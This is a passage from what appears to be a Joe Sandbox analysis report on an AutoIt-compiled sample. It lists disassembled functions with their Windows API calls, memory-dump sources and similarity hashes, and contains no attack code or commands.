Function 00E71290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
GetClientRect.USER32(?,?), ref: 00EAB84B
GetCursorPos.USER32(?), ref: 00EAB855
ScreenToClient.USER32(?,?), ref: 00EAB860

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
Instruction ID: 4a490ae2f993cd366a2e0a8bb42f429d662c0529e8e852a8fe77329bcabbf0b4
Opcode Fuzzy Hash: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
Instruction Fuzzy Hash: C4111935900159AFCB00DF98D8859FE77B8EF45300F408496F905F7252CB30AA55EBA5

Function 00ED1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED16D1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
Instruction ID: 7787cb41bfc8abcf4d1cc1ea3798e7168670c49fa9eb33abc197964a1bd2bcd3
Opcode Fuzzy Hash: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
Instruction Fuzzy Hash: 6A113931C0152DEBCF009FE6D948AFEBB78FF49751F45509AEA50B6240CB3095A2CB96

Function 00EA7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00EA722B

Part of subcall function 00EA7912: __fltout2.LIBCMT ref: 00EA793B

__cftog_l.LIBCMT ref: 00EA7251
__cftoe_l.LIBCMT ref: 00EA7283

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: b6136a95f5af23fce13b0d06fae1371f4983b149cda7ecbe25758cad142063ba
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 3E01807204414ABBCF129E84CC019EE3F66BF5E345F099515FA9868031D337E9B1AB91

Function 00EFB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EFB59E
ScreenToClient.USER32(?,?), ref: 00EFB5B6
ScreenToClient.USER32(?,?), ref: 00EFB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB5F5

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
Instruction ID: b19c38172bd36888543a3bc6f84a316730175087f2c69ae39602146f3663dfad
Opcode Fuzzy Hash: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
Instruction Fuzzy Hash: 931134B9D00209EFDB41CF99C4849EEBBB5FF48310F504166E915E2220D735AA55CF91

Function 00EFB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EFB8FE
_memset.LIBCMT ref: 00EFB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F37F20,00F37F64), ref: 00EFB93C
CloseHandle.KERNEL32 ref: 00EFB94E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
Instruction ID: 83cf1456cf1aec3a6931ed2d78d6a75e202fc71439b4b5ae50c3f8b11118d16e
Opcode Fuzzy Hash: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
Instruction Fuzzy Hash: 71F0DAF2544318BBE6203775AC05FBB7A9DEB09764F005021FA08E5192D7755910D7E8

Function 00ED6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00ED6E88

Part of subcall function 00ED794E: _memset.LIBCMT ref: 00ED7983

_memmove.LIBCMT ref: 00ED6EAB
_memset.LIBCMT ref: 00ED6EB8
LeaveCriticalSection.KERNEL32(?), ref: 00ED6EC8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
Instruction ID: 71a6749e3f7c9f614699f36f4ca1e224e4eca9ba85cffa5621ba1eb93d4e5310
Opcode Fuzzy Hash: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
Instruction Fuzzy Hash: CEF0543A100200AFCF016F55DC85A99BB69EF85320B049065FE086E22AC731E951CBB4

Function 00EFC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC030
LineTo.GDI32(00000000,?,?), ref: 00EFC03D
EndPath.GDI32(00000000), ref: 00EFC04D
StrokePath.GDI32(00000000), ref: 00EFC05B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
Instruction ID: 095ee8933b9f40b772688442ce9267ab39932069e925b0bf164f9cd0c220fc92
Opcode Fuzzy Hash: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
Instruction Fuzzy Hash: 5DF0BE3100125DBBDB122F55AC09FEE3F99AF0A320F148000FB11710E28B750555EB99

Function 00ECA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
AttachThreadInput.USER32(00000000), ref: 00ECA3BA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
Instruction ID: dd050fefc485faeb8427f8ef12ad636959e578423c35f88b5a904dbf8f510812
Opcode Fuzzy Hash: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
Instruction Fuzzy Hash: 2AE01571541268BADB201FA2DD0CFEB3E1CEF167A5F048038F909E80A0CA72C955CBE0

Function 00E72218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E72231
SetTextColor.GDI32(?,000000FF), ref: 00E7223B
SetBkMode.GDI32(?,00000001), ref: 00E72250
GetStockObject.GDI32(00000005), ref: 00E72258
GetWindowDC.USER32(?,00000000), ref: 00EAC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00EAC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00EAC112
GetPixel.GDI32(00000000,?,?), ref: 00EAC132
ReleaseDC.USER32(?,00000000), ref: 00EAC13D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
Instruction ID: cdc4b5e56def674db474657b274982c9e370e0f31661e06d79e4ea5e20999832
Opcode Fuzzy Hash: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
Instruction Fuzzy Hash: 10E06D32200244EEDF215FB5FC4D7E83B24EF5633AF108366FA69680E287724994DB12

Function 00EC8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00EC8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC882E), ref: 00EC8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C7E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
Instruction ID: 17ed5b796be43e08cf8af2d09abe57323313c47e1d2d53e8d06973e80250d6bc
Opcode Fuzzy Hash: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
Instruction Fuzzy Hash: 68E04F366423119FD7205FB26F0CF667BA8AF90796F094838E245E9050DE35844ACB61

Function 00EB2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00EB2187
GetDC.USER32(00000000), ref: 00EB2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
ReleaseDC.USER32(?), ref: 00EB21D2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
Instruction ID: cca3e0d9e271398c9f2f013c4fdbd4f189729166812027341e82e0ac667a93e4
Opcode Fuzzy Hash: 96c7a1f2c4d93123a5b09c6bc0ef093a801ce28a060d28dd282c10513dd2741e
Instruction Fuzzy Hash: B3E0C275800204AFDF019F61C848AAD7BB5AF88350F118429E95AE6220CB388145DF80

Function 00EB219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00EB219B
GetDC.USER32(00000000), ref: 00EB21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
ReleaseDC.USER32(?), ref: 00EB21D2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
Instruction ID: ce2808d9d70f8783e4ccb0abb7033264b377b5faeb433a9367035784a5d66cdd
Opcode Fuzzy Hash: ff9112df8721b5425a2b718dadd9dfc24416e1f66251e8157487e78256d8c9ca
Instruction Fuzzy Hash: 63E0EEB5800204AFCF019FB2C8486AD7BF5AF8C310F128029F95AE7220CF389145DF80

Function 00ECB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00ECB981

Strings

AutoIt3GUI, xrefs: 00ECB8F9
Container, xrefs: 00ECB8FE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 947fb720ff1d4afdfeea4627ce8aeba1a75449c1d18c3e012e83de4984117b05
Instruction ID: 1e94a1c234f6fe89456cfb1d47069a8d78deb2ebb3978e98db7afbe75d4a4e42
Opcode Fuzzy Hash: 947fb720ff1d4afdfeea4627ce8aeba1a75449c1d18c3e012e83de4984117b05
Instruction Fuzzy Hash: 9F915A71600601AFDB24DF28C985F6ABBE8FF48710F14956EF94AEB291DB71E841CB50

Function 00EDB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

__wcsnicmp.LIBCMT ref: 00EDB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB361

Strings

LPT, xrefs: 00EDB292

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: fce0999d4ff9a27153ec04e22f958a2cba36bcf64fc393c7b54245156996a4cd
Instruction ID: 3a465a682ce924f0aae2fead25a332bc6df60407a4938054f53c5dfb7688179a
Opcode Fuzzy Hash: fce0999d4ff9a27153ec04e22f958a2cba36bcf64fc393c7b54245156996a4cd
Instruction Fuzzy Hash: 6F615E75A00215EFCB14DB94C881EAEB7F4EF48310F15916AF54ABB391EB70AE41DB50

Function 00EB8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB8B1E
_memmove.LIBCMT ref: 00EB8B78

Strings

Oa, xrefs: 00EB8BF2, 00EBE39A, 00EBE3B6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove
String ID: Oa
API String ID: 4104443479-3945284152
Opcode ID: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
Instruction ID: cd13455c1ba5d1998a2df710f057b9266b69cbb102215f9f28376e6e0e65c6be
Opcode Fuzzy Hash: b933f1dc5721b4631f065087ca5058abef2760ad5f60ea6215085c4097f8e8fb
Instruction Fuzzy Hash: 5C5150B0900609DFCB64CF68C580AEEB7F5FF44308F14956AE85AE7350EB31A955CB51

Function 00E82AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E82AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E82AE1

Strings

@, xrefs: 00E82AD5

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
Instruction ID: 7e9f6451bef91ecded9a0bfb425c6bd3d82aecc688d7d6fe6de95767280c25d5
Opcode Fuzzy Hash: 53679ec3bb38b58cc40ddcd53a09f076142facb2637f636e2bf1700a6a98326a
Instruction Fuzzy Hash: 7C5137714187489BD320AF10D886BAFBBF8FFC5314F42885DF1D9611A6DB309929CB66

Function 00ED99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E7506B: __fread_nolock.LIBCMT ref: 00E75089

_wcscmp.LIBCMT ref: 00ED9AAE
_wcscmp.LIBCMT ref: 00ED9AC1

Strings

FILE, xrefs: 00ED99FA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
Instruction ID: 6474c8aa1021ab8394e145a084bd3872ae129af9638e291acfb153f11e08b0ef
Opcode Fuzzy Hash: 84398cb278c937ccf4ad75c87c856a4af1e16875cf850a7b03f7c2e9520847cf
Instruction Fuzzy Hash: 1341F672A00619BADF209AA0DC85FEFBBFDDF45714F01406BB904B7281DAB19E0587A1

Function 00EE2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE28C8

Strings

|, xrefs: 00EE2899

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
